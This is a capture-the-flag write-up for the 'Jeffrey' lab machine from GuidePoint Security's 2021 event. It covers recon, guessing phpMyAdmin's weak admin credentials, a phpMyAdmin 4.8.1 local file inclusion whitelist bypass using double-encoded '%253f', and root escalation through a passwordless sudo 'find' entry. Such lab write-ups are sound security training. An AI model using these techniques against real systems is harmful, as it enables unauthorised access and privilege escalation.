GuidePoint Security CTF 2021 – Jeffrey

~ This is a WriteUp for CTF Challenge from
GuidePoint Security CTF Event,
that’s held on 22 June until 28 June 2021 ~


It says that I can enumerate that device like I would in Penetration Test, such as Nmap, Nikto, Dirbuster, Metasploit is allowed.
Well then, let’s hop in !


RECONNAISANCE


As always in Penetration Testing, do Nmap first for Reconnaisance and find out what’s the service that are running and some open ports on that device.

Here’s the Nmap result :

There’s just 2 service open when recon, SSH and HTTP.
We need the required credentials to access the target’s machine
through SSH, but we currently have none.

So lets check the website (HTTP) first.

On the front page, there’s just a smilling Jeffrey GIF šŸ™‚
Let’s see the Source Code, maybe there’s something hidden lies in there.

From what the Source Code shows to us, there’s really nothing interesting.
But when we see the scroll bar on the bottom, we can still scroll to the right…

…and I got the First Flag >.<
(it seems the flag is hidden with color : white)
Let’s see at the front page once more and hit the ctrl + a button
to block all the characters, showing us what’s hidden)

First Flag :

Cool !
Now, let’s do more enumeration against the website.
I use Dirsearch Tool to find hidden directories.

Here’s the result :

Looks like phpMyAdmin and WordPress directories is accessible!
Let’s focus on the phpMyAdmin.


ACCESSING DATABASE


Because I don’t know what is the exact Admin’s login credentials,
I try some weak credentials.
Maybe the Admin using weak credentials.

And we’re in !

And on the right at the “Database Server” column, I spotted the Second Flag and looks like it doesn’t shows us the full flag.
Let’s grab it from the source code.

Second Flag :

As we saw earlier on the phpMyAdmin page,
there’s rolling text above the Second Flag.
But I prefer to look that rolling text from the source code.

So, looking before the flag..we can see some more information provided by the service.

Here’s the message…

~ “Aldus, quit using the admin account.
We removed the permissions.
We saved your password at /var/www/aldus.txt” ~

It says that the file “aldus.txt” is located at the /var/www directory.
And of course we can’t access that file directly by appending the
/aldus.txt on the URL.

Like for example :
http://10.10.10.14/phpmyadmin/aldus.txt
I’m assuming that, this “aldus.txt” file is located on the same directory as the /html directory is located (on the /www directory).


Vulnerability Analysis


From now, I’m thinking about what’s this phpMyAdmin version.
Maybe there’s an exploit related to that version.

I enumerate at the phpMyAdmin page,
scroll down a bit and I found the version !

phpMyAdmin
Version Information : 4.8.1

And for searching the exploit,
I prefer to search it from searchsploit command in Linux

Let’s see and examine the first module of this exploit,
by using this command down below…

~ You can see several program codes of “index.php” behind the
phpMyAdmin 4.8.1 version that leads to LFI vulnerability
right here ~

And from the exploitdb documentation concerning to the exploit…

..on the index.php, contains include file parameter called “target”
which is become a potential attack to Local File Inclusion.

And for the $_REQUEST[‘target’] itself has a function called
Core::checkPageValidity

Now, in this following code…
(which is always existed usually in phpMyAdmin 4.8.1 version…)

These code means…

  • The $whitelist array element content is to be checked as the same as $page content (which is what we have inputted).
  • and that $whitelist array value is specified as empty as showed in the code above (array $whitelist = [ ]).
  • In the first validation, if the content inside $whitelist is empty, then that $whitelist will be set as $goto_whitelist with its contents.

and the contents in $goto_whitelist is all these…

I found the “lists of $goto_whitelist content” above right here.

  • In the third validation, if the $whitelist (which is set to $goto_whitelist) contents in its array is the same as $page (which is what have we inputted to the browser) is the same,
    it will return true.

In summary, if what is inputted after the “?target=” parameter is the same as one of goto_whitelist contents, it will return true


INITIAL ACCESS


With this “payload”, we can bypass the whitelist and do LFI attack and access the aldus.txt file.

%253f is double URL encoded for “?” character
to bypass the validation.
..because the PHP code is using urldecode() function

I hit Enter, and I got the content of aldus.txt !

And if I try another payload, for example “tbl_indexes.php”, it will return true and bypass the whitelist, giving me aldus.txt content.

Here’s the result of decoded base64.

Let’s SSH to aldus and get the User Flag.

Third Flag :


Escalate Privilege


Now to search for potential privilege escalation vulnerability,
we can use “sudo -l” command for manual enumeration to see what binary that aldus can run with sudo rights.

Looks like “find” binary is allowed to run as sudo with no password.
We can use the command from here to escalate privilege.

Now we’re root !

Fourth Flag :

===============================================================

This was a fun challenge! However Iā€™m still learning and there were maybe more efficient ways of attacking this target. Please leave a comment below if you want to share tools or methods that could have been used to solve this challenge.

Thanks to the GuidePoint Security team that made this event possible, especially MaryLou Garcia and Alex Williams! Looking forward to the next event!

Leave a comment

Your email address will not be published. Required fields are marked *